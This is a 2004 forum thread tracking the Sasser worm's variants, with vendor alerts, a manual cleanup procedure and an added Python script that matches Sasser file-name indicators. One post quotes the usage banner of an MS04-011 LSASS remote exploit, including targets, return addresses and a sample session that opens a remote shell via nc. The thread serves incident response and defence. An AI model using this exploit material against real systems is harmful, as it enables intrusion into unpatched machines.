  EGeezer Go Bobcats Premium join:2002-08-04 Country!
| Win32.Sasser.c sasser lsass
Details sketchy - Will update as I find more
»www.ealaddin.com/home/csrt/analy···0414&cf=
Aladdin rates it as low threat as of 12:41 EDT
Win32.Sasser.c, Platforms: Win 95,Win 98,Win ME,Win NT,Win 2K,Win XP Updated on: 2 May, 2004 Arrival Form: HTTP,FTP Type: Win32,Worm Damage: Create files,Remote control -- "He beheld the form of Sleeping Beauty, wondering how her supple lips would feel against his own and contemplating whether or not an Altoid was strong enough to stand up against the kind of morning breath only a hundred year's nap could create." |
|
 psloss Premium join:2002-02-24 Alpharetta, GA
| FYI, it could be what F-Secure is calling "a minor repacked variant of Sasser.A" in their Web log: »www.f-secure.com/weblog/
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org |
|
  EGeezer Go Bobcats Premium join:2002-08-04 Country!
| reply to EGeezer This looks like a piece of a "proof of concept" code about three days old. Is it possibly the "c" variant? I already sent the rest to someone for evaluation and will post replies as appropriate.
EG
said by partial:
 * **** -ms04011-lsasrv-expl.c:
 *
 * MS04011 Lsasrv.dll RPC buffer overflow remote exploit
 * Version 0.1 coded by
 *
 * .:: [ ********* ]::.
 *
 * -------------------------------------------------------------------
 * Usage:
 *
 * expl [connectback IP] [options]
 *
 * Targets:
 * 0 [0x01004600]: WinXP Professional [universal] lsass.exe
 * 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
 * 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
 *
 * Options:
 * -t: Detect remote OS:
 * Windows 5.1 - WinXP
 * Windows 5.0 - Win2k
 * -------------------------------------------------------------------
 *
 * Tested on
 * - Windows XP Professional SP0 English version
 * - Windows XP Professional SP0 Russian version
 * - Windows XP Professional SP1 English version
 * - Windows XP Professional SP1 Russian version
 * - Windows 2000 Professional SP2 English version
 * - Windows 2000 Professional SP2 Russian version
 * - Windows 2000 Professional SP4 English version
 * - Windows 2000 Professional SP4 Russian version
 * - Windows 2000 Advanced Server SP4 English version
 * - Windows 2000 Advanced Server SP4 Russian version
 *
 *
 * Example:
 *
 * C:\**** -ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
 *
 * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
 * --- Coded by .:: [ ********** ]::. ---
 *
 * [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
 * [*] Connecting to 192.168.1.10:445 ... OK
 * [*] Detecting remote OS: Windows 5.0
 *
 *
 * C:\***** -ms04011-lsasrv-expl 1 192.168.1.10 4444
 *
 * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
 * --- Coded by .:: [ ************ ]::. ---
 *
 * [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
 * [*] Connecting to 192.168.1.10:445 ... OK
 * [*] Attacking ... OK
 *
 * C:\nc 192.168.1.10 4444
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
 *
and so on ... |
|
 psloss Premium join:2002-02-24 Alpharetta, GA
| said by EGeezer : This looks like a piece of a "proof of concept" code about three days old. Is it possibly the "c" variant? I already sent the rest to someone for evaluation and will post replies as appropriate.
More likely that the Sasser author(s) simply incorporated this code into the worm. The other variants may be doing the same thing.
The POC code as is just opens either a remote or reverse shell, which doesn't actually infect the system being attacked.
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org |
|
  keith2468 Premium,MVM join:2001-02-03 Winnipeg, MB | reply to EGeezer Someone needs to contact the worm author and make sure he knows not to go past "Z". |
|
 psloss Premium join:2002-02-24 Alpharetta, GA
| reply to EGeezer Apparently, this will continue to bear watching: »isc.incidents.org/diary.php?isc=···8eab8e7a
Excerpt: "SasserC, reported by Joe Stewert of Security Service Provider LURHQ (http://www.lurhq.com), is currently undergoing analysis. Joe reports that SasserC spawns 1024 threads to attack other systems, and it seems poised to torch networks that are not patched for the MS04-011 vulnerabilities."
So whether the .C variant is just a repack or the thing that ISC is talking about, the situation continues to evolve. Anyone interested should keep an eye on the LURHQ site (Full Disclosure is a good place, too.)
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org |
|
 psloss Premium join:2002-02-24 Alpharetta, GA
| reply to EGeezer Symantec has posted a writeup of what they are calling Sasser.C: »www.sarc.com/avcenter/venc/data/···orm.html
1024 threads versus 128 threads...likely a hexedit and possible repacking. This actually seems pretty dense because the infected system is going to spend a lot of time just switching thread contexts. I get the feeling that whoever the hex-editor was thinks more threads means faster.
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org |
|
 psloss Premium join:2002-02-24 Alpharetta, GA
| reply to EGeezer Another interesting note: I went over to F-Secure because they usually have better details in their writeups (in my opinion) to look for Sasser.C. Nothing yet, but this really jumped out at me in their Sasser.B writeup: »www.f-secure.com/v-descs/sasser_b.shtml
Excerpt: quote: the scanning routine starts 128 processes instead of 128 threads
That's a big difference which I don't see noted in the Symantec writeup. Guess I'll have to review other AV vendors to see what they're saying.
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org |
|
  DGDTrathole
join:2000-05-07 Newmarket, NH
1 edit | reply to EGeezer from a corporate security person I deal with:
Process for cleaning a Sasser infected system
There are two ways that this can be done, in NORMAL mode, and in SAFE mode. Try the NORMAL mode first and if that doesn't work then try SAFE mode. Processes are below.
The error that you will see if you are infected with Sasser is
"System Process C:\windows\system32\lsass.exe terminated unexpectedly with status code -107374189"
NORMAL mode
If your computer keeps rebooting, first do this:
As soon as your computer reboots and Windows loads and you are logged in, click Start >> Run. In the command line box, type the following: shutdown -a and click ok
This should stop the box from rebooting.
To end the malicious process: Right-click on the Task Bar.
Click Task Manager.
Click the Processes tab.
Double-click the Image Name column header to alphabetically sort the processes.
Scroll through the list and look for the following processes:
avserve.exe
any process with a name consisting of 4 or 5 digits followed by _up.exe (eg 74354_up.exe).
If you find any such process, click it, and then click End Process.
Exit the Task Manager.
Next, go to »windowsupdate.microsoft.com/ and install all missing patches. Make sure MS04-011, Security Update for Microsoft Windows (835732), is one of those patches. Or go directly to the patch from Microsoft. Microsoft Security Bulletin MS04-011 »www.microsoft.com/technet/securi···011.mspx
Finally, go to one of the sites below and download a Sasser Worm removal tool. Run this tool to clean the system of the Sasser worm.
SAFE mode
Restart the computer in the Safe Mode. To do so after the Power On Self Test (POST), press and hold the F8 key.
From the Safe Mode, click Start, Run. In the Run box, type "regedit" (without the quotes) and press enter.
Navigate to: HKEY_LOCAL_MACHINE +Software +Microsoft +Windows +CurrentVersion +Run
In the right-hand pane, look for any entry that might include:
avserve.exe avserve2.exe any process with a name consisting of 4 or 5 digits followed by _up.exe (eg 74354_up.exe).
Delete any/all of the above entries and exit regedit.
You have now disabled the worm from running at startup, so reboot and go back into normal mode again, and turn off ALL system restores to purge your system of any remnants.
To turn off systems restores... Click Start, Programs, Accessories, System Tools, System Restore, System Restore Settings, "System Restore" tab, and check the box. "Turn Off System Restore on all drives", click "Apply" and "OK".
And delete all previous system restores by Click Start, Accessories, System Tools, Select the main system disk (typically C:), Disk Cleanup, "More Options" tab, "System Restore" section, "Clean up" button, click "Yes".
Open Windows Explorer to the ..\Windows\ ..\WinNT\ ..\Windows\System32\ ..\WinNT\System32\
folder and DELETE *any* files called avserve.exe avserve2.exe any process with a name consisting of 4 or 5 digits followed by _up.exe (eg 74354_up.exe).
Next, go to the ..\Windows\Prefetch\ or ..\WinNT\Prefetch\ folder and find the reference to the above file/s (any reference will be similar to: -.PF), for example, avserve.exe-0235D8H6.pf, and DELETE it/them.
Now you can download and install the patch from Microsoft. Microsoft Security Bulletin MS04-011 »www.microsoft.com/technet/securi···011.mspx
Update your anti-virus package and do a full system scan.
Download one of the Sasser Worm removal tools from the list below and run it to clean the system.
Sasser Removal Tools
Symantec W32.Sasser Removal Tool »www.sarc.com/avcenter/venc/data/···ool.html
F-Secure Sasser Removal Tool »ftp://ftp.f-secure.com/anti-virus/tool···sser.zip »ftp://ftp.f-secure.com/anti-virus/tool···sser.exe
McAfee Sasser Removal Tool »vil.nai.com/vil/stinger
Microsoft's Sasser Removal Tool »www.microsoft.com/downloads/deta···ylang=en "Step 4: Review Additional Technical Resources - If the cleaning tool above doesn't work for you, use the free worm removal tool available at your preferred antivirus software vendor's Web site"
A bit more on getting into SAFE mode
Windows 2000 / XP Users
To get into the Windows 2000 / XP Safe mode as the computer is booting press and hold your "F8 Key" which should bring up the "Windows Advanced Options Menu" as shown below. Use your arrow keys to move to "Safe Mode" and press your Enter key.
Trouble Getting into Windows 2000 or Windows XP Safe mode - If after several attempts you are unable to get into Windows 2000 or Windows XP safe mode as the computer is booting into Windows turn off your computer. When the computer is turned on the next time Windows should notice that the computer did not successfully boot and give you the safe mode screen.
Note: With some computers if you press and hold a key as the computer is booting you will get a stuck key message as the computer is booting. If this occurs instead of pressing and holding the "F8 key" tap the "F8 key" continuously until you get the startup menu.
Here's what you'll see on the screen after holding the F8 key.
Use the up and down arrow keys to move the highlight to your choice. |
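The cleaning procedure above is a manual hunt for a handful of file names: avserve.exe, avserve2.exe, anything matching "4 or 5 digits followed by _up.exe", the matching values under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and the Prefetch entries those executables leave behind. The following is an added example (not code from the post or from any of the vendors it links) that turns those indicators into a repeatable check. It runs over constructed sample data standing in for a process list, the Run key's values, directory listings and Prefetch file names; the function and variable names are my own, and the sample values are invented for illustration.

```python
import re

# Indicator names exactly as listed in the cleaning procedure quoted above.
SASSER_FIXED_NAMES = {"avserve.exe", "avserve2.exe"}
# "4 or 5 digits followed by _up.exe", e.g. 74354_up.exe.
SASSER_UP_PATTERN = re.compile(r"^\d{4,5}_up\.exe$", re.IGNORECASE)
# Prefetch entries look like <exe>-<8 chars>.pf (the post's example: avserve.exe-0235D8H6.pf).
PREFETCH_PATTERN = re.compile(r"^(?P<exe>.+\.exe)-[0-9A-Z]{8}\.pf$", re.IGNORECASE)
# Startup location named in the procedure (documentation only; nothing here touches the registry).
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"


def basename(path: str) -> str:
    """Last path component, with surrounding quotes and trailing arguments removed.
    Run-key values may look like '"C:\\WINDOWS\\avserve.exe" /x' or 'mobsync.exe /logon'."""
    path = path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        path = path[1:end] if end > 0 else path[1:]
    else:
        path = path.split(" ", 1)[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def is_sasser_name(name_or_path: str) -> bool:
    """True if the file name (or the file named by a path/command line) matches an indicator."""
    n = basename(name_or_path).lower()
    return n in SASSER_FIXED_NAMES or bool(SASSER_UP_PATTERN.match(n))


def is_sasser_prefetch(filename: str) -> bool:
    """True if a Prefetch (.pf) entry was generated by one of the indicator executables."""
    m = PREFETCH_PATTERN.match(basename(filename))
    return bool(m) and is_sasser_name(m.group("exe"))


def find_indicators(processes, run_values, files, prefetch_files):
    """Apply the name checks to each place the procedure tells you to look."""
    return {
        "processes": [p for p in processes if is_sasser_name(p)],
        "run_values": {k: v for k, v in run_values.items() if is_sasser_name(v)},
        "files": [f for f in files if is_sasser_name(f)],
        "prefetch": [f for f in prefetch_files if is_sasser_prefetch(f)],
    }


# Constructed sample data; a real check would read the live process list,
# the Run key, the %SystemRoot% / System32 directories and %SystemRoot%\Prefetch.
SAMPLE_PROCESSES = ["lsass.exe", "explorer.exe", "avserve.exe", "74354_up.exe",
                    "svchost.exe", "update.exe", "123_up.exe"]  # 123_up.exe: only 3 digits
SAMPLE_RUN_VALUES = {"avserve.exe": r"C:\WINDOWS\avserve.exe",
                     "Synchronization Manager": "mobsync.exe /logon"}
SAMPLE_FILES = [r"C:\WINDOWS\avserve2.exe", r"C:\WINDOWS\system32\lsass.exe",
                r"C:\WINDOWS\system32\74354_up.exe"]
SAMPLE_PREFETCH = ["AVSERVE.EXE-0235D8H6.pf", "NOTEPAD.EXE-336351A3.pf"]


def run_sample():
    return find_indicators(SAMPLE_PROCESSES, SAMPLE_RUN_VALUES, SAMPLE_FILES, SAMPLE_PREFETCH)


if __name__ == "__main__":
    for location, hits in run_sample().items():
        print(f"{location}: {hits}")
```

Two points worth noting. The digit-count boundary matters: 123_up.exe is deliberately left out of the sample hits, and the same applies to a legitimate updater that happens to end in _up.exe with fewer digits. And matching on names is only as good as the indicator list; a repacked or renamed variant will not be caught by it, which is why the post (and every vendor quoted in this thread) ends with "install MS04-011 and run an updated scanner" rather than stopping at the manual clean-up.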
|
  Randy Bell Premium join:2002-02-24 Santa Clara, CA
| reply to psloss
 This Evening's LU Covers the Worm |
said by psloss : Symantec has posted a writeup of what they are calling Sasser.C: »www.sarc.com/avcenter/venc/data/···orm.html
As stated in that writeup -- Covered by this evening's {May 02} liveupdate {screenshot}.  -- "But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13) |
|
  Allnew Premium,MVM join:2003-02-01 Denmark- EU. clubs:
| reply to EGeezer Sasser worms could affect 300 million computers worldwide - Virus Alerts, by Panda Software (»www.pandasoftware.com)
Madrid, May 03 2004 - The number of computers affected by the Sasser worm continues to rise, and the situation looks set to worsen as companies return to work after the weekend. Luis Corrons, head of PandaLabs warns of the threat, "Bear in mind that some 300 million computers worldwide are vulnerable to attack by the Sasser worm, which gives an idea of the potential scale of the threat. New variants are also likely to emerge and for this reason, even though we launched a pre-alert at the weekend, we have now declared a red alert."
The Sasser worms are particularly dangerous for corporate environments as they can spread across networks in a matter of seconds. Both the French Stock Exchange and the France Presse news agency have fallen victim to this new malicious code and their communications were affected on Saturday.
The situation appears to be even more serious as the creators of the worm are coordinating the continuous launch of new variants in order to increase the probability of infection. PandaLabs has now detected the presence of Sasser.C, which can launch up to 1024 processes in memory, making it potentially far more virulent than its predecessors.
The appearance of the new Sasser worms is seemingly directly linked to the wave of viruses blighting the Internet over the last few months. PandaLabs has also detected the new Netsky.AC worm, which like its predecessors contains a message hidden inside its code. On this occasion however, there are no insulting messages to the authors of other worms such as Bagle or Mydoom, but instead a message directed at antivirus vendors. The message claims that the authors are also responsible for the Sasser worms:
Hey, av firms, do you know that we have programmed the sasser virus?!?. Yeah thats true! Why do you have named it sasser? A Tip: Compare the FTP-Server code with the one from Skynet.V!!! LooL! We are the Skynet...' Here is an part of the sasser sourcecode you named so, lol
Given the serious nature of the situation, Panda Software has made its PQRemove utility available, free of charge, to all users to detect and eliminate the viruses. Click here to access the tool.
Panda Software informs users that the new worm can be detected and disinfected with an up-to-date antivirus, but it is important to install the Microsoft patch to ensure that Sasser.A doesn't re-infect computers. The vulnerability exploited by this worm was reported by Microsoft recently in bulletin MS04-011 (»www.microsoft.com/technet/securi···011.mspx), along with the patch. Panda Software has made the updates necessary to its products available to clients.
More information about these and other IT threats is available from: »www.pandasoftware.com/virus_info···lopedia/
Red alert from Panda. This is serious I guess :(:( -- The two most common elements in the universe are Hydrogen and stupidity. Harlan Ellison (1934 - ) |
|
  Randy Bell Premium join:2002-02-24 Santa Clara, CA
| reply to EGeezer Also got this from Panda today:
Virus Alerts [RED ALERT: The new Sasser.D worm aggravates the epidemic that is sweeping across the Internet - 05/03/04]
quote: - The new Sasser.D worm aggravates the epidemic that is sweeping across the Internet - Virus Alerts, by Panda Software (»www.pandasoftware.com)
Madrid, May 03 2004 - PandaLabs has detected the appearance of a new variant of the Sasser worm (Sasser.D) -very similar to its predecessors- which, according to the data gathered by the multinational's International Alerts Network, has started to cause incidents.
In order to combat the effects of the epidemic triggered by the variants of the Sasser worm, Panda Software has made two new PQRemove utilities available to all users. These applications can clean infected computers and restore the configuration computers had prior to the worm's attack.
The first PQRemove is specific for networks and removes Sasser and all of its variants from any network that could have been affected. You can download at: »www.pandasoftware.com/support/
The second PQRemove application cleans every computer that could have been attacked by Sasser.D. You can download at: »www.pandasoftware.com/download/utilities/
Far from receding, the global epidemic unleashed by Sasser and its variants is expanding progressively. As expected, the number of companies whose network has been affected by these dangerous worms is increasing. According to The Daily Telegraph, Sydney's railway radio communication network has been seriously affected by a computer virus. Besides, some 300 million computers worldwide are vulnerable to attack by the Sasser worm, which gives an idea of the potential scale of the threat.
There can be no doubt about the intentions of the creators of these worms: to put as many viruses as possible in circulation in order to multiply the probability of infection. Luis Corrons, head of PandaLabs warns of the threat: "New variants of Sasser will continue to appear in the next few hours, and it will be necessary to be protected. To ensure this, users should install the Microsoft patch that corrects the vulnerability exploited by Sasser".
Panda Software informs users that the new worms can be detected and disinfected with an up-to-date antivirus, but it is important to install the Microsoft patch to ensure that Sasser.A doesn't re-infect computers. The vulnerability exploited by this worm was reported by Microsoft recently in bulletin MS04-011 (»www.microsoft.com/technet/securi···011.mspx ), along with the patch. Panda Software has made the updates necessary to its products available to clients.
Panda Software's online support center (»www.pandasoftware.com/support/) also offers help to users.
Panda Software clients can update their antivirus through the applications installed on their computers.
In addition, the users can scan their computers on line for free with the ActiveScan solution, available in the company web page »www.pandasoftware.com.
More information about these and other IT threats is available from »www.pandasoftware.com/virus_info···lopedia/
|
  kevin11
@verizon.ne
| what if we can't get to safe mode!?
I get the following error upon start-up:
smass.exe The file could not be found and then the computer restarts before windows is even loaded.
Same problem occurs in "safe mode." So I have no way of initiating the shutdown -a because the start menu never appears in time.
This virus is not a level 2! It caused a complete disaster in my office . |
|
 vic102482 Premium join:2002-04-30 Upper Marlboro, MD | reply to EGeezer Re: Win32.Sasser.c sasser lsass
Make sure to patch your machines. You don't have to worry about any variants because the basic vulnerability is closed. -- I tie a rope around my penis and jump from a tree, don't you wanna grow up to be just like me!!!! |
|